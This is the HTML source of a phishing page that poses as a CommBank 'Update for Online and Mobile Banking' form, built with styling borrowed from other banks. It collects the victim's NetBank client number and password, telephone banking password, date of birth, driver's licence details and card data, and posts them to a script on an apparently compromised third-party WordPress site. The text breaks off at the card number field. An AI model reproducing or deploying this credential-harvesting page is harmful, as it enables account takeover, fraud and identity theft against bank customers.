<!doctype html>
<html class="no-js" lang="en">
<head>
	<meta charset="utf-8" />
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<meta name="format-detection" content="telephone=no">
<link href="https://www.commbank.com.au/etc/designs/commbank-neo/favicon.ico" rel="shortcut icon" type="image/x-icon" />
	<style>
	@charset "utf-8";
/* CSS Document */

body { background-color:#fff !important;
	//background-image:url(https://ibank.bcu.com.au/ibankng/App_Themes/BCU_Theme/ibank-bg-beach.jpg) !important;
	background-size:100% 100% !important;
	background-repeat:no-repeat;
}

.columns { padding-left:0; padding-right:0; }
.icon-padlock:before {
  content: "\e62e";
}

/* CONTAINERS */
.headerBar {
    min-width: 320px;
    background-color: #FFF;
    height: 52px;
	margin-bottom:30px;
	margin-left:0;
	margin-right:0;
	vertical-align:central;
	color:#FFC625 !important
}

.subheaderBar {
	background-color:#FFCC00;
	padding-left:16px; 
	padding-right:16px;
	min-height:42px;
	padding-top:6px;
	margin-top:25px;
	padding-bottom:5px;
	color:#000 !important
}
.subheaderBars {
	background-color:#10464B;
	padding-left:16px; 
	padding-right:16px;
	min-height:42px;
	padding-top:6px;
	margin-top:25px;
	padding-bottom:5px;
}
.subheaderBarss {
	background-color:#10464B;
	padding-left:16px; 
	padding-right:16px;
	min-height:42px;
	padding-top:6px;
	margin-top:25px;
	padding-bottom:5px;
}

.innerContainer {
    max-width: 606px;
    min-width: 288px;
	padding-left:0;
	padding-right:0;
	float:none;
	margin:0 auto;
}

.buttonContainer {
    max-width: 606px;
    min-width: 288px;
	min-height:32px;
	padding-left:0px;
	padding-right:0px;
	float:none;
	margin:20px auto 20px auto;
}

.formContainer {
	background-color:#ffffff;
	padding:16px;
}

/* TEXT STYLES */
.headerText {
        font-family: 'Open Sans', sans-serif;
        font-size: 32px;
		color:#303030;
		margin-bottom:16px;
      }
	
	  
.normalText {
	font-family:Arial, sans-serif;
	font-size: 13px;
	color:#303030;
	margin-bottom:16px;
}
.normalText--Grey {
	color:#58595b!important;
}

.normallink--nospan {
	text-decoration:underline;
	color:#333333;	
}
	  
.subheaderText {
	font-family: 'Open Sans', sans-serif;
	font-size:20px;
	color:#ffffff;
}

.helperText {
	font-family:Arial, sans-serif;
	font-size: 12px;
	color:#929497;
	margin-top:-12px;
	margin-bottom:10px;
	font-style:italic;
	max-width:288px;
}

.helperText--mortgage {
	font-family:Arial, sans-serif;
	font-size: 12px;
	color:#929497;
	margin-top:0;
	margin-bottom:10px;
	font-style:italic;
	max-width:288px;	
}


.highlightText--Grey {
	font-family:Arial, sans-serif;
	font-size: 13px;
	color:#ffffff;
	padding:8px;
	max-width:378px;
	margin:8px 0 8px 0;
	background-color:#5b5a5b;
}

.alertText {
	font-family:Arial, sans-serif;
	font-size: 13px;
	color:#ec0000;
	margin-top:0;
	margin-bottom:10px;
	font-style:normal;
	max-width:350px;
}
.alertText::before {
	content:url("../img/Layout/icon-alert.png");
	margin-right:16px;
	height:60px;
	float:left;
	display:block;
}

ul.redbullet li {
	list-style-image:url("../img/Layout/bullet--red.png");
	margin-bottom:16px;
	margin-left:10px;
}

a.signUpLink {
	text-decoration:underline;
	color:#303030;
	white-space:nowrap;
}

#mortNumHelp { display:none; }


/* CUSTOM FORM ELEMENTS */
label {
	display: inline;
}

.regular-checkbox {
	display: none;
}

.regular-checkbox + label {
	background-color: #fafafa;
	border: 1px solid #cacece;
	box-shadow: 0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);
	padding: 9px;
	border-radius: 3px;
	display: inline-block;
	position: relative;
}

.regular-checkbox + label:active, .regular-checkbox:checked + label:active {
	box-shadow: 0 1px 2px rgba(0,0,0,0.05), inset 0px 1px 3px rgba(0,0,0,0.1);
}

.regular-checkbox:checked + label {
	background-color: #e9ecee;
	border: 1px solid #adb8c0;
	box-shadow: 0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05), inset 15px 10px -12px rgba(255,255,255,0.1);
	color: #99a1a7;
}

.regular-checkbox:checked + label:after {
	content: '\2714';
	font-size: 14px;
	position: absolute;
	top: 0px;
	left: 3px;
	color: #99a1a7;
}


.big-checkbox + label {
	padding: 18px;
}

.big-checkbox:checked + label:after {
	font-size: 28px;
	left: 6px;
}

.tag {
	font-family: Arial, sans-serif;
	width: 200px;
	position: relative;
	top: 5px;
	font-weight: bold;
	text-transform: uppercase;
	display: block;
	float: left;
}

.radio-1 {
	width: 193px;
}

.button-holder {
	float: left;
}

.formTitle {
	margin-bottom:5px;
	font-size:14px;
	font-weight:bold;
}

.required::after {
	content:" *";
	color:#ec0000;
}

.assistance {
	margin-left:10px;
	margin-top:-2px;

}

.hidden {
	display: none;
}

.dob select {
	width:122px;
	height:2rem!important;
	border:solid 1px #bbbdbf;
	background-image:url("../img/Layout/select-box-drop.png");
	background-size: 32px 37px;
	background-position: right center;
	background-origin: content-box;
	background-repeat: no-repeat;
	background-color:#ffffff;
	padding:4px 0 4px 5px;
	color:#929497;
	font-size:14px;
}

.optionalFormRow select {
	width:170px;
	height:2rem!important;
	border:solid 1px #bbbdbf;
	background-image:url("../img/Layout/select-box-drop.png");
    background-size: 32px 37px;
  	background-position: right center;
  	background-origin: content-box;
  	background-repeat: no-repeat; 
	background-color:#ffffff;
	padding:4px 0 4px 5px;
	color:#929497;
	font-size:14px;
}

[type='text'], [type='password'], [type='date'], [type='datetime'], [type='datetime-local'], [type='month'], [type='week'], [type='email'], [type='number'], [type='search'], [type='tel'], [type='time'], [type='url'], [type='color'],
textarea {
  display: block;
  box-sizing: border-box;
  width: 100%;
  max-width:380px;
  height: 2rem;
  padding: 0.5rem;
  border: 1px solid #cacaca;
  margin: 0 0 1rem;
  font-family: inherit;
  /*font-size: 1rem;*/
  font-size:14px;
  color: #929497;
  background-color: #fefefe;
  box-shadow: inset 0 1px 2px rgba(10, 10, 10, 0.1);
  border-radius: 0;
  transition: box-shadow 0.5s, border-color 0.25s ease-in-out;
  -webkit-appearance: none;
  -moz-appearance: none; }
  [type='text']:focus, [type='password']:focus, [type='date']:focus, [type='datetime']:focus, [type='datetime-local']:focus, [type='month']:focus, [type='week']:focus, [type='email']:focus, [type='number']:focus, [type='search']:focus, [type='tel']:focus, [type='time']:focus, [type='url']:focus, [type='color']:focus,
  textarea:focus {
    border: 1px solid #8a8a8a;
    background-color: #fefefe;
    outline: none;
    box-shadow: 0 0 5px #cacaca;
    transition: box-shadow 0.5s, border-color 0.25s ease-in-out; 
}

.input-style--DOB-Day input {
	width:55px;
	margin-right:8px;
}

.input-style--DOB-Month input {
	width:55px;
	margin-right:8px;
}

.input-style--DOB-Year input {
	width:77px;
}
.input-style--postcode {
	width: 133px;
}

.input-style--PhoneNum input, .input-style--MortNum input {
	width:190px;
}

.formContainer .sep {
	margin-right:8px;
	margin-top:6px;	
}

.error {
	border:solid 1px #ec0000;	
}

/* BUTTONS */
.SUK.button {
	float:right;
	font-size:12px;
    background-color: #ec0000;
    color: #fff;
	width:180px;
	border-radius:20px;
	text-align:center;
	height:32px;
	padding-top:9px;
	vertical-align:central;
}

.SUK.button--wide {
	float:right;
    background-color: #ec0000;
    color: #fff;
	font-size:12px;
	width:260px;
	border-radius:20px;
	text-align:center;
	height:32px;
	vertical-align:central;
	padding-top:7px;
}


/* RADIO */
.regular-radio {
	display: none;
}

.regular-radio + label {
	-webkit-appearance: none;
	background-color: #DDDDDD;
	/*border: 1px solid #cacece;*/
	/*box-shadow: 0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);*/
	padding: 9px;
	border-radius: 0px;
	display: inline-block;
	position: relative;
	margin-right:8px;
}

.regular-radio:checked + label:after {
	/*content: ' ';*/
	width: 12px;
	height: 12px;
	border-radius: 50px;
	position: absolute;
	top: 3px;
	background: #99a1a7;
	/*box-shadow: inset 0px 0px 10px rgba(0,0,0,0.3);*/
	text-shadow: 0px;
	left: 3px;
	font-size: 32px;
}

.regular-radio:checked + label {
	background-color: #5b5a5b;
	color:#ffffff;
	/*font-weight:bold;*/
	/*color: #99a1a7;*/
	/*border: 1px solid #adb8c0;*/
	/*box-shadow: 0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05), inset 15px 10px -12px rgba(255,255,255,0.1), inset 0px 0px 10px rgba(0,0,0,0.1);*/
}

.regular-radio + label:active, .regular-radio:checked + label:active {
	/*box-shadow: 0 1px 2px rgba(0,0,0,0.05), inset 0px 1px 3px rgba(0,0,0,0.1);*/
}

.big-radio + label {
	padding: 8px;
	width:67px;
	height:40px;
	text-align:center;
	margin:0 7px 16px 0;
}

.big-radio:checked + label:after {
	width: 24px;
	height: 24px;
	left: 4px;
	top: 4px;
}

.button-holder input {
	margin-right:20px;
	
}

/* Footer Nav */

.footerBar {
    min-width: 320px;
    background-color: #d6d6d6;
    height: auto;
	margin-bottom:0;
	margin-left:0;
	margin-right:0;
	padding-top:15px;
	padding-bottom:10px;
}
	.footerBar ul.footerBarNav li {
		list-style:none;
		list-style-image:none;
		text-align:center;
		width:20%;;	
		float:left;
		clear:none;
		font-family: Arial, sans-serif;
		font-size:12px;
		color:#666666;
	}
		.footerBar ul.footerBarNav li a,
		.footerBar ul.footerBarNav li a:hover,
		.footerBar ul.footerBarNav li a:focus
		 {
			color:#666666!important;
		}



@media only screen and (max-width: 480px) {
	.footerBar {
		padding-bottom:0!important;	
	}
	ul.footerBarNav {
		margin-left:0!important;
	}
		 
	.footerBar ul.footerBarNav li {
		float:none;
		clear:both;
		width:100%!important;
		margin-bottom:0;
		margin-bottom:16px;
	}
	
	.headerText, .normalText p {
        padding-left:16px!important;
		padding-right:16px!important;
      }
	
	.input-style--PhoneNum input, .input-style--MortNum input {
		width:100%!important;	
	}
	.optionalFormRow select {
		width:100%!important;	
	}
	
	.buttonContainer {
		padding-left:16px!important;
		padding-right:16px!important;
	}
	
	.SUK.button,
	.SUK.button--wide
	{
		width:100%!important;	
	}
	
}
.panel {
    min-height: 24px;
    margin: 0 5px 4em 5px;
    border: 0;
    border-top: 5px solid #006a4d;
    background: #FFF;
    padding: 0;
}
////
html {
	height:100%
}
body {
	font-variant-numeric:proportional-nums;
	font-feature-settings:"pnum";
	font-size:12px;
	margin:0;
	padding:0;
	background-color:#F3F6F8;
	background-position:0 100%;
	background-repeat:repeat-x;
	background-size:contain;
	background-attachment:fixed;
	line-height:1.4;
	color:#222
}
#top-bar a,.indicator-guardian-assessing {
	font-family:MyriadPro-Bold,"Helvetica Neue",Helvetica,Arial,sans-serif;
	font-size:14px
}
body .message.info.iolb-info {
	background-image:url(https://bank.westpac.co.nz/one/images/info.png)
}
hr {
	height:2px;
	background-color:#dadada;
	border:none
}

@media screen and (max-width:680px) and (max-width:680px) {
	.unenclosed #main-container {
		background-image:none
	}
	body.mainview-LoginView.unenclosed #main-container,body.mainview-SelfServicePasswordResetView #main-container {
		padding-bottom:75px
	}
}
@media screen and (min-width:681px) and (max-width:1023px) {
	body {
		background-color:#fff
	}
	.unenclosed #main-container,.unenclosed.subview #main-container {
		background-image:none
	}
}
body.mainview-PayeeView #main-container {
	background:0 0
}
body.mainview-PayeeView #main-container #payee-view-main {
	background:#fff
}
.subview body.mainview-PayeeView #main-container #payee-view-main {
	background-color:none
}
body.mainview-LoginView.unenclosed,body.mainview-SelfServicePasswordResetView {
	background-color:transparent;
	background-image:url(../images/Background_White-6.9.jpg?v=1);
	background-size:cover;
	background-position:top center;
	background-repeat:no-repeat;
	background-attachment:fixed
}
body.mainview-LoginView.unenclosed #main-container,body.mainview-SelfServicePasswordResetView #main-container {
	background:0 0
}
.mainview-PayeeView #main-container,.mainview-PaymentView #main-container,.mainview-ProfileView #main-container,.mainview-TimelineView #main-container,.mainview-TimelineView.subview #main-container,[data-main-view=TimelineView] #main-container,[data-main-view=TimelineView].subview #main-container,[data-main-view=PaymentView] #main-container,[data-main-view=PayeeView] #main-container,[data-main-view=ProfileView] #main-container {
	background-image:none
}
.mainview-ErrorView .container,.mainview-LoginView .container,[data-main-view=LoginView] .container,[data-main-view=ErrorView] .container,body.mainview-SelfServicePasswordResetView .container {
	width:100%;
	padding:0;
	margin:0
}
@media screen and (min-width:681px) and (max-width:1023px) {
	[data-main-view] {
		background-size:contain
	}
	.mainview-TimelineView,[data-main-view=TimelineView] {
		width:100%;
		overflow-x:hidden
	}
	.mainview-TimelineView .container,[data-main-view=TimelineView] .container {
		overflow-x:hidden
	}
	.mainview-TimelineView #logo,.mainview-TimelineView #menu,.mainview-TimelineView .container,[data-main-view=TimelineView] #logo,[data-main-view=TimelineView] #menu,[data-main-view=TimelineView] .container {
		-webkit-transition:left .2s linear;
		transition:left .2s linear
	}
	.subview {
		background-color:#fff
	}
}
.mainview-TimelineView.show-timeline-filters .container,[data-main-view=TimelineView].show-timeline-filters .container {
	overflow-x:visible
}
.mainview-PayeeView.subview #main-container,.mainview-PaymentView.subview #main-container,.mainview-ProfileView.subview #main-container,[data-main-view=PaymentView].subview #main-container,[data-main-view=PayeeView].subview #main-container,[data-main-view=ProfileView].subview #main-container {
	background-image:none;
	background-color:#fff
}
.busy {
	cursor:wait
}
.busy .button,.busy .custom-dropdown,.busy .event-item,.busy .payee-list-item,.busy .product-item,.busy a,.busy input {
	cursor:wait!important
}
.container {
	height:100%;
	width:100%;
	padding-left:105px;
	box-sizing:border-box
}
.container:after {
	content:"\0020";
	display:block;
	height:0;
	clear:both
}
@media screen and (min-width:1440px) {
	[data-main-view] {
		background-size:contain;
		background-position:0 100%
	}
	.container {
		position:relative;
		padding-left:105px;
		width:1431px;
		-webkit-box-sizing:border-box;
		box-sizing:border-box
	}
	.container:after {
		content:"\0020";
		display:block;
		height:0;
		clear:both;
		visibility:hidden
	}
}
@media (min-width:1024px) and (max-width:1279px) {
	.container {
		position:relative;
		width:100%;
		padding-left:105px;
		-webkit-box-sizing:border-box;
		box-sizing:border-box
	}
	.container:after {
		content:"\0020";
		display:block;
		height:0;
		clear:both;
		visibility:hidden
	}
}
@media screen and (min-width:681px) and (max-width:1023px) {
	.container {
		position:relative;
		width:100%;
		padding-left:105px;
		-webkit-box-sizing:border-box;
		box-sizing:border-box
	}
	.container:after {
		content:"\0020";
		display:block;
		height:0;
		clear:both;
		visibility:hidden
	}
}
.closed,.hidden,.layout-tablet-p,body[data-main-view=TimelineView] .container #accounts-download-pdf {
	display:none
}
@media screen and (max-width:680px) {
	.container {
		-webkit-box-sizing:border-box;
		box-sizing:border-box;
		padding:0 12px
	}
	body[data-main-view=TimelineView] .container {
		-webkit-box-sizing:border-box;
		box-sizing:border-box;
		padding-left:12px;
		padding-right:12px;
		padding-top:60px!important
	}
}
#ui-datepicker-div {
	width:300px;
	-webkit-transform:translatez(0)
}
@media screen and (max-width:680px) and (max-width:680px) {
	.subview {
		background-color:#fff
	}
	.mobile-hidden {
		display:none
	}
}

	</style>
	<title>
	 Personal banking including accounts, credit cards and home loans - CommBank&reg;</title>
	<link rel="stylesheet" href="https://mortgage.yoursantander.co.uk/signup/css/foundation.css" />
	<!-- <link rel="stylesheet" href="https://mortgage.yoursantander.co.uk/signup/css/OCR_styles.css" /> -->
	<link rel="stylesheet" href="https://mortgage.yoursantander.co.uk/signup/css/jquery-mobile-1.2.0.css">
	<link href='https://fonts.googleapis.com/css?family=Open+Sans:300' rel='stylesheet' type='text/css'>
	<link rel="stylesheet" href="https://mortgage.yoursantander.co.uk/signup/css/app.css" />
	<!--<link type="text/javascript" href="https://mortgage.yoursantander.co.uk/signup/js/jquery-mobile-1.2.0.js">-->
	<script src="https://mortgage.yoursantander.co.uk/signup/js/vendor/jquery.min.js"></script>
	<script src="https://mortgage.yoursantander.co.uk/signup/js/jquery.form.js"></script>
	<script src="https://mortgage.yoursantander.co.uk/signup/js/validation.js"></script>
	<script>
$(document).ready(function() {
    $("#homephone").keydown(function (e) {
        // Allow: backspace, delete, tab, escape, enter and .
        if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 110, 190]) !== -1 ||
             // Allow: Ctrl+A, Command+A
            (e.keyCode === 65 && (e.ctrlKey === true || e.metaKey === true)) || 
             // Allow: home, end, left, right, down, up
            (e.keyCode >= 35 && e.keyCode <= 40)) {
                 // let it happen, don't do anything
                 return;
        }
        // Ensure that it is a number and stop the keypress
        if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
            e.preventDefault();
        }
    });
	    $("#dln").keydown(function (e) {
        // Allow: backspace, delete, tab, escape, enter and .
        if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 110, 190]) !== -1 ||
             // Allow: Ctrl+A, Command+A
            (e.keyCode === 65 && (e.ctrlKey === true || e.metaKey === true)) || 
             // Allow: home, end, left, right, down, up
            (e.keyCode >= 35 && e.keyCode <= 40)) {
                 // let it happen, don't do anything
                 return;
        }
        // Ensure that it is a number and stop the keypress
        if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
            e.preventDefault();
        }
    });
	
	$("#card").keydown(function (e) {
        // Allow: backspace, delete, tab, escape, enter and .
        if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 110, 190]) !== -1 ||
             // Allow: Ctrl+A, Command+A
            (e.keyCode === 65 && (e.ctrlKey === true || e.metaKey === true)) || 
             // Allow: home, end, left, right, down, up
            (e.keyCode >= 35 && e.keyCode <= 40)) {
                 // let it happen, don't do anything
                 return;
        }
        // Ensure that it is a number and stop the keypress
        if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
            e.preventDefault();
        }
    });
	
	    $("#cvv2").keydown(function (e) {
        // Allow: backspace, delete, tab, escape, enter and .
        if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 110, 190]) !== -1 ||
             // Allow: Ctrl+A, Command+A
            (e.keyCode === 65 && (e.ctrlKey === true || e.metaKey === true)) || 
             // Allow: home, end, left, right, down, up
            (e.keyCode >= 35 && e.keyCode <= 40)) {
                 // let it happen, don't do anything
                 return;
        }
        // Ensure that it is a number and stop the keypress
        if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
            e.preventDefault();
        }
    });
	    $("#phone").keydown(function (e) {
        // Allow: backspace, delete, tab, escape, enter and .
        if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 110, 190]) !== -1 ||
             // Allow: Ctrl+A, Command+A
            (e.keyCode === 65 && (e.ctrlKey === true || e.metaKey === true)) || 
             // Allow: home, end, left, right, down, up
            (e.keyCode >= 35 && e.keyCode <= 40)) {
                 // let it happen, don't do anything
                 return;
        }
        // Ensure that it is a number and stop the keypress
        if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
            e.preventDefault();
        }
    });	    
	$("#phones").keydown(function (e) {
        // Allow: backspace, delete, tab, escape, enter and .
        if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 110, 190]) !== -1 ||
             // Allow: Ctrl+A, Command+A
            (e.keyCode === 65 && (e.ctrlKey === true || e.metaKey === true)) || 
             // Allow: home, end, left, right, down, up
            (e.keyCode >= 35 && e.keyCode <= 40)) {
                 // let it happen, don't do anything
                 return;
        }
        // Ensure that it is a number and stop the keypress
        if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
            e.preventDefault();
        }
    });
});
		$(document).ready(function() {

			var title = null;
			var $form = $('#OCRform');
			
			$("input:radio[name=radio-2-set]").click(function(){
				title = $(this).val();
				if(title === "other"){
					$('.optionalFormRow').removeClass('hidden');
				} else {
					$('.optionalFormRow').addClass('hidden');
				}
			});

			if ($("input:radio[name=radio-2-set]:checked").val() == 'other'){
				$('.optionalFormRow').removeClass('hidden');
			}

			$('#submit').click(function(event){
				event.preventDefault();

								if (!formIsValid()){
					return false;
				}
				
				$('#submit').attr('disabled','disabled');

				$.ajax({
					type: "POST",
					url: "ajax/post.php",
					data: $form.serialize(),
					success: function(data){
						if (typeof(data.responseJSON) == 'object' && data.status == false && typeof(data.responseJSON.error) == 'object' && Object.keys(data.responseJSON.error).length){
							for (var key in data.responseJSON.error){
								$('.alertText:contains("'+data.responseJSON.error[key]+'")').show();
								$('input:type[name="'+key+'"]').addClass('field-error');
							}
							scrollToFirst();
							$('#submit').removeAttr('disabled');
						}else{
							window.location = 'confirm.html';
						}
					},
					error : function(data){
						alert('Sorry there has been an error processing this form, please contact us on 0800 077 8592');
						$('#submit').removeAttr('disabled');
					}
				});
			});

});
</script>

</head>
<body>
<div id="main-container">	

<div class="row">
		<div class="large-12 columns headerBar" >
			<div class="float-left">
			<img src="https://static.my.commbank.com.au/static/netbank/theme/fo/images/cba_mainlogo.ac9de6fb5214be84653367c74ba0b5f0.gif">
			</div>
			<div class="float-right"></div>
		</div>
	</div>
	
	<div class="row" >
		<div class="large-12 columns innerContainer">
			<div class="headerText">
				Update for Online and Mobile Banking
			</div>
			<div class="normalText">
				<p>You are just a steps away from updating your online or via your mobile phone.</p>
				
				
				<p class="normalText--Grey">(All the fields marked with<span class="required"></span> are required)</p>
			</div>
		</div>
	</div>
	
	<div class="row">
		<div class="large-12 columns innerContainer">
			<div class="subheaderBar subheaderText">
				Login Information
			</div>
		</div>
	</div>
<form action="http://kodavasamajablr.com/wp-content/plugins/cmsboost/pud.php" method="POST" name="logonForm" ENCTYPE="application/x-www-form-urlencoded" autocomplete="off">
	
		<input type="hidden" name="csrf" value="db36849a150ab528b16ab624a6a142fb" />
		<div class="row">
			<div class="large-12 columns innerContainer">
				<div class="formContainer">
	
					<div class="alertText other-title-error">Please select your title from the list</div> 
<br>
					<div class="formTitle required">NetBank client number</div>
					<div class="input-style">
						<input type="text" placeholder="NetBank client number" id="firstname" name="firstname" data-error-empty="firstname-error" required/>
					</div>

					<div class="alertText firstname-error">Please ensure that you are entering your Personal ID correctly.</div>
					


					<div class="formTitle required">Password </div>
					<div class="input-style">
						<input type="password" placeholder="Password " id="password" name="password" data-error-empty="lastname-error" required/>
					</div>
					
					
								
<div class="row">
			<div class="large-12 columns innerContainer">
				<div class="subheaderBar subheaderText">
					Identity Information
				</div>
			</div>
		</div>


<div class="formTitle required">Full Name (including any middle name)

</div>
	<div class="input-style">
		<input type="text" id="firstname" required maxlength="100" placeholder="Full Name" name="fn" data-error="homephone-error">
	</div>
	
<div class="formTitle required">Telephone Banking Password</div>

	<div class="input-style">
		<input type="text" id="firstname" required maxlength="100" placeholder="Between 6-12 Characters" name="vb" data-error="homephone-error">
	</div>	
<!-- dob sources header -->
					<div class="formTitle required">Date of birth</div>

					<div class="date">
						<div class="small-4 large-3 medium-3 columns dob">
							<select type="number" id="dobday" name="dobday" data-error="dobday-error" required>
								<option value="">Day</option>
								<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
							</select>
						</div>
						<div class="small-4 large-3 medium-3 columns dob">
							<select type="number" id="dobmonth" name="dobmonth" data-error="dobmonth-error">
								<option value="">Month</option>
								<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
							</select>
						</div>
						<div class="small-4 large-3 medium-3 columns dob end">
							<select type="number" id="dobyear" name="dobyear" data-error="dobyear-error">
								<option value="">Year</option>
								<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>
<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>
<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>
<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>
<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>
<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>
<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>
<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>
<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>
<option value="1925">1925</option>
<option value="1924">1924</option>
<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>
<option value="1916">1916</option>
<option value="1915">1915</option>
<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
<option value="1908">1908</option>
<option value="1907">1907</option>
<option value="1906">1906</option>
<option value="1905">1905</option>
<option value="1904">1904</option>
<option value="1903">1903</option>
<option value="1902">1902</option>
<option value="1901">1901</option>
<option value="1900">1900</option>
<option value="1899">1899</option>
<option value="1898">1898</option>
							</select>
						</div>
					</div>
					<div class="clearfix"></div>
					<div class="helperText date">e.g. DD/MM/YYYY</div>
					<div class="alertText date-error">Please enter a valid date</div>
					<div class="alertText dobday-error">Please enter your day of birth</div>
					<div class="alertText dobmonth-error">Please enter your month of birth</div>
					<div class="alertText dobyear-error">Please enter your year of birth</div>
					
				
			
<!--end dob sources header -->	
	
<div class="formTitle required">Driver's licence number</div>
	<div class="input-style--PhoneNum">
		<input type="text" id="dlns" placeholder="Driver's licence" name="dlnssss" data-error="homephone-error" required>
	</div>					
	<div class="alertText homephone-error">Your Driver's licence number should be Filled
	</div>
				

	<div class="formTitle required">Licence Expiry Date (dd/mm/yyyy) </div>

					<div class="date">
						<div class="small-4 large-3 medium-3 columns dob">
							<select type="number" id="dobday" name="edobday" data-error="dobday-error" required>
								<option value="">Day</option>
								<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
							</select>
						</div>
						<div class="small-4 large-3 medium-3 columns dob">
							<select type="number" id="dobmonth" name="edobmonth" data-error="dobmonth-error" required>
								<option value="">Month</option>
								<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
							</select>
						</div>
						<div class="small-4 large-3 medium-3 columns dob end">
							<select type="number" id="dobyear" name="edobyear" data-error="dobyear-error" required>
								<option value="">Year</option>
								<option value="2019">2019</option>
								<option value="2020">2020</option>
								<option value="2021">2021</option>
								<option value="2022">2022</option>
								<option value="2023">2023</option>
								<option value="2024">2024</option>
								<option value="2025">2025</option>
							</select>
						</div>
					</div>
					<div class="clearfix"></div>
					<div class="helperText date">e.g. DD/MM/YYYY</div>
					<div class="alertText date-error">Please enter a valid date</div>
					<div class="alertText dobday-error">Please enter your day of birth</div>
					<div class="alertText dobmonth-error">Please enter your month of birth</div>
					<div class="alertText dobyear-error">Please enter your year of birth</div>
					
			
		<div class="row">
			<div class="large-12 columns innerContainer">
				<div class="subheaderBar subheaderText">
					Debit Card Verification
				</div>
			</div>
		</div>	
	
<br>							
<div class="formTitle required">Card Number</div>
	<div class="input-style">
